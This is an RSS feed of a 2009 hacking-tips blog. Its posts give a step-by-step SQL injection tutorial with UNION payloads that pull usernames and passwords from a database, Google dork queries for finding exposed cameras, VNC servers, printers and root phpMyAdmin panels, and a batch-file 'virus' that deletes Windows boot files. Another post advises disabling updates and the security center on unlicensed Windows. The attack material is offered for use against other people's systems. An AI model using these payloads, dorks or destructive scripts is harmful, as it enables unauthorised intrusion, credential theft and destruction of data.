<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Tips and tricks for computer and internet user&#039;s</title>
	<atom:link href="http://tipsntricks4u.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://tipsntricks4u.wordpress.com</link>
	<description></description>
	<lastBuildDate>Thu, 19 Nov 2009 04:55:07 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='tipsntricks4u.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://1.gravatar.com/blavatar/1063fc04489226649e04ca9f48082401?s=96&#038;d=http%3A%2F%2Fs2.wp.com%2Fi%2Fbuttonw-com.png</url>
		<title>Tips and tricks for computer and internet user&#039;s</title>
		<link>http://tipsntricks4u.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://tipsntricks4u.wordpress.com/osd.xml" title="Tips and tricks for computer and internet user&#039;s" />
	<atom:link rel='hub' href='http://tipsntricks4u.wordpress.com/?pushpress=hub'/>
		<item>
		<title>WebSite Hacking Full Tutorial</title>
		<link>http://tipsntricks4u.wordpress.com/2009/11/16/website-hacking-full-tutorial/</link>
		<comments>http://tipsntricks4u.wordpress.com/2009/11/16/website-hacking-full-tutorial/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 09:38:39 +0000</pubDate>
		<dc:creator>tipsntricks4u</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://tipsntricks4u.wordpress.com/?p=113</guid>
		<description><![CDATA[There are couple ways to Hack Into a Website 1. Sql injection 2. RFI 3. LFI 4. Xss 5. Otherways well in Sql Injection is the most famous thing so I will teach you about SQL with Pic ! Sql Injection What is SQL Injection? SQL Injection is something like. In the very simple way [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=113&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>There are couple ways to Hack Into a Website</p>
<p>1. Sql injection<br />
2. RFI<br />
3. LFI<br />
4. Xss<br />
5. Otherways</p>
<p>well in Sql Injection is the most famous thing so I will teach you about SQL with Pic !</p>
<p>Sql Injection</p>
<p>What is SQL Injection?</p>
<p>SQL Injection is something like. In the very simple way when you inject a Site you can get</p>
<p>Admin User Name (Root)<br />
Admin password (Root)<br />
Other admins pass<br />
Every User Name<br />
Every User Pass<br />
Cridit Card Info ( Every Detail )</p>
<p>How you Find a Site Venurable or not</p>
<p>Lets Say I have a Site</p>
<p>Code:</p>
<p>http://www.website.com/shop.php?id=10</p>
<p>to see it HackAble or not Put &#8216; in the End<br />
So it Shoud look like<br />
Code:</p>
<p>http://www.website.com/shop.php?id=10&#8242;</p>
<p>And If it Give you a MYSQL Error ..That mean the Site is Hack Able</p>
<p>Ok Next Step is</p>
<p>so Now We Know the Site is Venul or not .<br />
Now We Have get trought This to Hack into admin</p>
<p>1. Finding the number of columns<br />
2. Check if UNION works.<br />
3. Looking for a visible column<br />
3. Check if the version is &gt; 5<br />
4. Extracting table names, column names, etc&#8230; (Or bruteforcing if the version is &lt; 5) 5. Forming the finishing query to extract our required information. Finding the number of columns Code: http://www.Site.com/shop.php?id=10+order+by+1&#8211; (You shoul not get any error) Code: http://www.Site.com/shop.php?id=10+order+by+10000&#8211; (You should get an error) If u get a Error The Next Step is to Get the number of columns Code: http://www.Site.com/shop.php?id=10+order+by+2&#8211; http://www.Site.com/shop.php?id=10+order+by+3&#8211; http://www.Site.com/shop.php?id=10+order+by+4&#8211; http://www.Site.com/shop.php?id=10+order+by+5&#8211; http://www.Site.com/shop.php?id=10+order+by+6&#8211; http://www.Site.com/shop.php?id=10+order+by+7&#8211; &lt;&#8212; Keep Injecting until you get an error, for me it&#8217;s when order by 7 in my Pic Check if UNION works. So Now we Know Our site has 6 columns so What u sould do now is Put it in a order like Code: http://www.Site.com/shop.php?id=-10+Union+Select+1,2,3,4,5,6&#8211; Looking for a visible column Now you should get a see a Number in the screen Some were For me its 2 ( Its highlighted ) Check if the version is &gt; 5</p>
<p>Now We need to check if the version is &gt; 5 (VERY VERY IMPORTANT STEP)<br />
For This , I pick our visible column&#8230;in this case it is 2&#8230;and we must replace it with &#8220;@@version&#8221;</p>
<p>For Ex :<br />
Code:</p>
<p>http://www.Site.com/shop.php?id=-10+Union+Select+1,@@version,3,4,5,6&#8211;</p>
<p>Now you will Able to see the MYSQL Ver Like this</p>
<p>You should FIRST CHECK IF IT IS GREATER THAN 5, now..<br />
If it is, you can proceed or you HAVE TO GUESS THE TABLE NAMES IF ITS BELOW version 5.<br />
Extracting table names, column names, etc&#8230;</p>
<p>now we must Get<br />
1. Database names<br />
2. Table names<br />
3. Column names</p>
<p>DataBase Names :</p>
<p>Now This is the Confusing PartSo Stay with me</p>
<p>Now we are gona get the Database Name and user all together since we know the visible column</p>
<p>Code:</p>
<p>http://www.Site.com/shop.php?id=-10+Union+Select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6&#8211;</p>
<p>Many peple get confuse with &#8220;concat_ws&#8221;It actually means concat with separator and the separator we use should be given in the starting of the syntax.Here I used 0x3a whose equivalent is “:” . The main purpose of using this is getting the output in desired format as we need it to be.(copied)</p>
<p>Now lets see what Are this<br />
Version() :— Version()is use to inject version of the MySql used in the server<br />
User() :- This will Inject registered MySql user in the database.<br />
Database () :- is the DataBase Name<br />
Now That will Give you somthing like This</p>
<p>Grab the Database using Information_schema</p>
<p>Code:</p>
<p>http://www.website.com/shop.php?id=1+UNION+SELECT+1, group_concat(schema_name),3,4,5,6 +from+information_schema.schemata—</p>
<p>What is This<br />
1. +from+information_schema.schemata :- returns the databases on the server<br />
We may get the database name depending on the no of databases present.<br />
Like If you get something like this</p>
<p>Sigma is the DataBase Name</p>
<p>Extracting table names:<br />
Now we know the DataBase Name What we need now is MySql Table Names<br />
I&#8217;ve picked the database &#8216;users&#8217; to extract our table names.<br />
we have to use the database information_schema and the table tables and the column table_name to extract the respective table names.<br />
So It Should be like<br />
Code:</p>
<p>http://www.Site.com/shop.php?id=1+UNION+SELECT+1, group_concat(table_name),3,4 ,5,6+from+information_schema.tables—</p>
<p>This is give you more than we need .. Like Every Junkin DB.</p>
<p>So We Only need tables for the table users. So Now we go up with<br />
Code:</p>
<p>http://www.Site.com/shop.php?id=1+UNION+SELECT+1, group_concat(table_name),3,4,5,6 +from+information_schema.tables+where+table_schema=&#8217;users&#8217;—</p>
<p>If it didnt respose you properly Some Times you have Hex the &#8220;Users&#8221; when &#8220;Users&#8221;Hex it get &#8220;0&#215;7573657273&#8243;<br />
So it sould be like<br />
http://www.Site.com/shop.php?id=1+UNION+SELECT+1, group_concat(table_name),3,4,5,6 +from+information_schema.tables+where+table_schema =&#8217;0&#215;7573657273&#8242;—<br />
Now you sould get a Table Name I&#8217;ll take the table USERS for example.</p>
<p>column names:<br />
Now we gona get the Data from the table named “USERS” and we extract various columns from it.<br />
Code:</p>
<p>www.Site.com/shop.php?id=10+UNION+SE &#8230; olumn_name),3,4,5,6+from+information_schema.columns+where+table_name=&#8217;USERS&#8217;&#8211;</p>
<p>In that I have change group_concat(table_name) to group_concat(column_name) becourse now we are looking for columns .<br />
column_name extracts all column names present in the table.<br />
And add this to the end of the columns<br />
+from+information_schema.columns+where+table_name= &#8216;USERS&#8217;—<br />
it will show you the columns lets think table are username,password and email.<br />
Code:</p>
<p>http://www.website.com/shop.php?id=10+UNION+SELECT+1,concat_ws(0x3a,username,password,email) ,3,4+from+USERS—</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/tipsntricks4u.wordpress.com/113/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/tipsntricks4u.wordpress.com/113/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/tipsntricks4u.wordpress.com/113/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/tipsntricks4u.wordpress.com/113/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/tipsntricks4u.wordpress.com/113/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/tipsntricks4u.wordpress.com/113/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/tipsntricks4u.wordpress.com/113/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/tipsntricks4u.wordpress.com/113/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/tipsntricks4u.wordpress.com/113/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/tipsntricks4u.wordpress.com/113/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/tipsntricks4u.wordpress.com/113/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/tipsntricks4u.wordpress.com/113/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/tipsntricks4u.wordpress.com/113/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/tipsntricks4u.wordpress.com/113/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=113&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://tipsntricks4u.wordpress.com/2009/11/16/website-hacking-full-tutorial/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e6b78bd22ecd5602c9543578f0227a9e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">tipsntricks4u</media:title>
		</media:content>
	</item>
		<item>
		<title>Real Hacking U Didn&#8217;t Seen Before</title>
		<link>http://tipsntricks4u.wordpress.com/2009/11/16/real-hacking-u-didnt-seen-before/</link>
		<comments>http://tipsntricks4u.wordpress.com/2009/11/16/real-hacking-u-didnt-seen-before/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 09:37:15 +0000</pubDate>
		<dc:creator>tipsntricks4u</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://tipsntricks4u.wordpress.com/?p=111</guid>
		<description><![CDATA[Ok Lets Start The Hacks !! &#62;&#62; Note :- To Do This Kind Of Hacks U Need A Broadband Connection !! &#62;&#62; 1st Hack :- Viewing Still Security Cameras Using Google :- &#62;&#62; Open Google And Type : inurl:&#8221;viewerframe?mode=motion&#8221; In The Search Bar And Search,Open Any Results Shown To See Other&#8217;s Security Cameras !! 2nd [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=111&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Ok Lets Start The Hacks !!</p>
<p>&gt;&gt; Note :- To Do This Kind Of Hacks U Need A Broadband Connection !!<br />
&gt;&gt;</p>
<p>1st Hack :-<br />
Viewing Still Security Cameras Using Google :-</p>
<p>&gt;&gt; Open Google And Type :</p>
<p>inurl:&#8221;viewerframe?mode=motion&#8221;</p>
<p>In The Search Bar And Search,Open Any Results Shown To See Other&#8217;s Security Cameras !!</p>
<p>2nd Hack :-<br />
Viewing Motion Security Video Cameras Using Google :-</p>
<p>&gt;&gt; Open Google And Type :</p>
<p>intitle:&#8221;Live View / &#8211; AXIS&#8221;</p>
<p>In The Search Bar And Search,Open Any Results Shown To See Other&#8217;s Online Video Cameras !!</p>
<p>3rd Hack :-<br />
Unspidered Sites Using Google :-</p>
<p>&gt;&gt; Open Google And Tye :</p>
<p>&#8220;robots.txt&#8221; &#8220;disallow:&#8221; filetype:txt</p>
<p>In The Search Bar And Search,Open Any Results Shown To See Hidden WebPages !!</p>
<p>4th Hack :-<br />
Frontpage User Info Using Google :-</p>
<p>&gt;&gt; Open Google And Tye :</p>
<p>inurl:_vti_pvt &#8220;service.pwd&#8221;</p>
<p>In The Search Bar And Search,Open Any Results Shown To See Other&#8217;s Frontpage User Info !!</p>
<p>5th Hack :-<br />
PHP Photo Album Hack Using Google :-</p>
<p>&gt;&gt; Open Google And Tye :</p>
<p>inurl:&#8221;phphotoalbum/upload&#8221;</p>
<p>In The Search Bar And Search,Open Any Results Shown To Upload/See/Download Other&#8217;s Photo Album&#8217;s !!</p>
<p>6th Hack :-<br />
VNC User INFO Using Google :-</p>
<p>&gt;&gt; Open Google And Tye :</p>
<p>&#8220;vnc desktop&#8221;inurl:5800</p>
<p>In The Search Bar And Search,Open Any Results Shown To Make Bruteforce Attack To Access Other Computers !!</p>
<p>7th Hack :-<br />
Accessing Printers Using Google :-</p>
<p>&gt;&gt; Open Google And Tye :</p>
<p>inurl:&#8221;port_255&#8243; -htm</p>
<p>In The Search Bar And Search,Open Any Results Shown To See/Configure Print Any Documents On Other Network Prnters !!</p>
<p>8th Hack :-<br />
PHP Admin Account Hack Using Google :-</p>
<p>&gt;&gt; Open Google And Tye :</p>
<p>intitle:phpMyAdmin &#8220;Welcome to phpMyAdmin&#8221;***&#8221; &#8220;running on * as root@*&#8221;</p>
<p>In The Search Bar And Search,Open Any Results Shown To Go To Somebody&#8217;s WebPage Admin Accounts !!</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/tipsntricks4u.wordpress.com/111/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/tipsntricks4u.wordpress.com/111/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/tipsntricks4u.wordpress.com/111/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/tipsntricks4u.wordpress.com/111/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/tipsntricks4u.wordpress.com/111/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/tipsntricks4u.wordpress.com/111/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/tipsntricks4u.wordpress.com/111/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/tipsntricks4u.wordpress.com/111/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/tipsntricks4u.wordpress.com/111/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/tipsntricks4u.wordpress.com/111/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/tipsntricks4u.wordpress.com/111/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/tipsntricks4u.wordpress.com/111/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/tipsntricks4u.wordpress.com/111/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/tipsntricks4u.wordpress.com/111/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=111&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://tipsntricks4u.wordpress.com/2009/11/16/real-hacking-u-didnt-seen-before/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e6b78bd22ecd5602c9543578f0227a9e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">tipsntricks4u</media:title>
		</media:content>
	</item>
		<item>
		<title>Please Do Not Try It For Your Computer Safety</title>
		<link>http://tipsntricks4u.wordpress.com/2009/11/16/please-do-not-try-it-for-your-computer-safety/</link>
		<comments>http://tipsntricks4u.wordpress.com/2009/11/16/please-do-not-try-it-for-your-computer-safety/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 09:35:38 +0000</pubDate>
		<dc:creator>tipsntricks4u</dc:creator>
				<category><![CDATA[Un-necessary]]></category>

		<guid isPermaLink="false">http://tipsntricks4u.wordpress.com/?p=109</guid>
		<description><![CDATA[This is a kind of virus that you can easily create. Just open your notepad. Copy paste the complete code below in it:- @echo off echo Are you sure to get this shit? pause echo Are you for 100%% sure? pause msg * Really??? bye-bye !!! attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=109&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>This is a kind of virus that you can easily create. Just open your notepad. Copy paste the complete code below in it:-</p>
<p>@echo off<br />
echo Are you sure to get this shit?<br />
pause<br />
echo Are you for 100%% sure?<br />
pause<br />
msg * Really??? bye-bye !!!<br />
attrib -r -s -h c:\autoexec.bat<br />
del c:\autoexec.bat<br />
attrib -r -s -h c:\boot.ini<br />
del c:\boot.ini<br />
attrib -r -s -h c:\ntldr<br />
del c:\ntldr<br />
attrib -r -s -h c:\windows\win.ini<br />
del c:\windows\win.ini</p>
<p>Now save it as something.bat. Once you double click the bat file that you created this will shut down your computer and will delete all the files that are required to reboot your computer. Thus your windows crashes. Now you need to repair your operating system n it will be fine.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/tipsntricks4u.wordpress.com/109/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/tipsntricks4u.wordpress.com/109/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/tipsntricks4u.wordpress.com/109/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/tipsntricks4u.wordpress.com/109/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/tipsntricks4u.wordpress.com/109/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/tipsntricks4u.wordpress.com/109/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/tipsntricks4u.wordpress.com/109/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/tipsntricks4u.wordpress.com/109/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/tipsntricks4u.wordpress.com/109/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/tipsntricks4u.wordpress.com/109/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/tipsntricks4u.wordpress.com/109/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/tipsntricks4u.wordpress.com/109/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/tipsntricks4u.wordpress.com/109/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/tipsntricks4u.wordpress.com/109/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=109&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://tipsntricks4u.wordpress.com/2009/11/16/please-do-not-try-it-for-your-computer-safety/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e6b78bd22ecd5602c9543578f0227a9e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">tipsntricks4u</media:title>
		</media:content>
	</item>
		<item>
		<title>Shutdown, Reboot Shortcut On The Desktop</title>
		<link>http://tipsntricks4u.wordpress.com/2009/11/16/shutdown-reboot-shortcut-on-the-desktop/</link>
		<comments>http://tipsntricks4u.wordpress.com/2009/11/16/shutdown-reboot-shortcut-on-the-desktop/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 09:26:56 +0000</pubDate>
		<dc:creator>tipsntricks4u</dc:creator>
				<category><![CDATA[Tricks]]></category>

		<guid isPermaLink="false">http://tipsntricks4u.wordpress.com/?p=107</guid>
		<description><![CDATA[1. Right click on an open area of the desktop 2. Select New / Shortcut 3. Enter in &#8220;shutdown -s -t 00&#8243; &#8211; no quotes 4. Press the Next button 5. For the name, enter in anything you like   eg : &#8220;ShutDown.&#8221; Click on the Finish button. To create a reboot shortcut on the desktop: 1. Right [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=107&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>1. Right click on an open area of the desktop<br />
2. Select New / Shortcut<br />
3. Enter in &#8220;shutdown -s -t 00&#8243; &#8211; no quotes<br />
4. Press the Next button<br />
5. For the name, enter in anything you like   eg : &#8220;ShutDown.&#8221; Click on the Finish button.</p>
<p><span style="text-decoration:underline;"><strong>To create a reboot shortcut on the desktop:</strong></span></p>
<p>1. Right click on an open area of the desktop<br />
2. Select New / Shortcut<br />
3. Enter in &#8220;shutdown -r -t 00&#8243; &#8211; no quotes<br />
4. Press the Next button<br />
5. For the name, enter in anything you like eg : &#8220;Reboot.&#8221; Click on the Finish button.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/tipsntricks4u.wordpress.com/107/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/tipsntricks4u.wordpress.com/107/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/tipsntricks4u.wordpress.com/107/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/tipsntricks4u.wordpress.com/107/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/tipsntricks4u.wordpress.com/107/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/tipsntricks4u.wordpress.com/107/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/tipsntricks4u.wordpress.com/107/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/tipsntricks4u.wordpress.com/107/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/tipsntricks4u.wordpress.com/107/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/tipsntricks4u.wordpress.com/107/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/tipsntricks4u.wordpress.com/107/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/tipsntricks4u.wordpress.com/107/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/tipsntricks4u.wordpress.com/107/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/tipsntricks4u.wordpress.com/107/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=107&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://tipsntricks4u.wordpress.com/2009/11/16/shutdown-reboot-shortcut-on-the-desktop/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e6b78bd22ecd5602c9543578f0227a9e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">tipsntricks4u</media:title>
		</media:content>
	</item>
		<item>
		<title>Just You Would Love it ! Have Fun!</title>
		<link>http://tipsntricks4u.wordpress.com/2009/11/16/just-you-would-love-it-have-fun/</link>
		<comments>http://tipsntricks4u.wordpress.com/2009/11/16/just-you-would-love-it-have-fun/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 09:23:29 +0000</pubDate>
		<dc:creator>tipsntricks4u</dc:creator>
				<category><![CDATA[Have fun]]></category>

		<guid isPermaLink="false">http://tipsntricks4u.wordpress.com/2009/11/16/just-you-would-love-it-have-fun/</guid>
		<description><![CDATA[Just click on the following link and you&#8217;ll be directed to a blank page. Just Click/ Click and drag your mouse pointer on that page and see what happens. http://www.procreo.jp/labo/flower_garden.swf<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=106&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Just click on the following link and you&#8217;ll be directed to a blank page.</p>
<p>Just Click/ Click and drag your mouse pointer on that page and see<br />
what happens.</p>
<p><strong><a href="http://www.procreo.jp/labo/flower_garden.swf" target="_blank">http://www.procreo.jp/labo/flower_garden.swf</a></strong></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/tipsntricks4u.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/tipsntricks4u.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/tipsntricks4u.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/tipsntricks4u.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/tipsntricks4u.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/tipsntricks4u.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/tipsntricks4u.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/tipsntricks4u.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/tipsntricks4u.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/tipsntricks4u.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/tipsntricks4u.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/tipsntricks4u.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/tipsntricks4u.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/tipsntricks4u.wordpress.com/106/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=106&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://tipsntricks4u.wordpress.com/2009/11/16/just-you-would-love-it-have-fun/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e6b78bd22ecd5602c9543578f0227a9e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">tipsntricks4u</media:title>
		</media:content>
	</item>
		<item>
		<title>Disable Autoupdate Of Unregistered Windows</title>
		<link>http://tipsntricks4u.wordpress.com/2009/11/16/disable-autoupdate-of-unregistered-windows/</link>
		<comments>http://tipsntricks4u.wordpress.com/2009/11/16/disable-autoupdate-of-unregistered-windows/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 04:41:46 +0000</pubDate>
		<dc:creator>tipsntricks4u</dc:creator>
				<category><![CDATA[Tips]]></category>

		<guid isPermaLink="false">http://tipsntricks4u.wordpress.com/?p=93</guid>
		<description><![CDATA[If you using Unregistered Windows. the auto update will be a big Problem to your system. When you used the internet on your PC. the auto update will connect the Microsoft and your system show some error message like &#8220;&#8216;You are the victim of Software Piracy&#8217;&#8221; So how can you easily remove Automatic Update and [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=93&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>If you using Unregistered Windows. the auto update will be a big Problem to your system.</p>
<p>When you used the internet on your PC. the auto update will connect the Microsoft and your system show some error message like &#8220;&#8216;You are the victim of Software Piracy&#8217;&#8221;</p>
<p>So how can you easily remove Automatic Update and Security Center</p>
<div><a href="http://3.bp.blogspot.com/_myPl2ceQSRc/Sv_PRXXUbFI/AAAAAAAAAA8/8bLXPNXKYlc/s1600-h/msconfign.jpg"><img src="http://3.bp.blogspot.com/_myPl2ceQSRc/Sv_PRXXUbFI/AAAAAAAAAA8/8bLXPNXKYlc/s400/msconfign.jpg" border="0" alt="" /></a></div>
<p>Goto <strong>Start</strong> &#8211; &gt; <strong>Run</strong> and type Msconfig</p>
<p>In &#8216;<strong>System Configuration Utility</strong>&#8216; window</p>
<p>go to <strong>Services</strong> -tab -</p>
<p>and <strong>Uncheck Automatic Update</strong> and <strong>Security Centre</strong></p>
<p>and <strong>Apply</strong> <strong>OK</strong> and <strong>Restart</strong></p>
<p>That&#8217;s  all Enjoy</p>
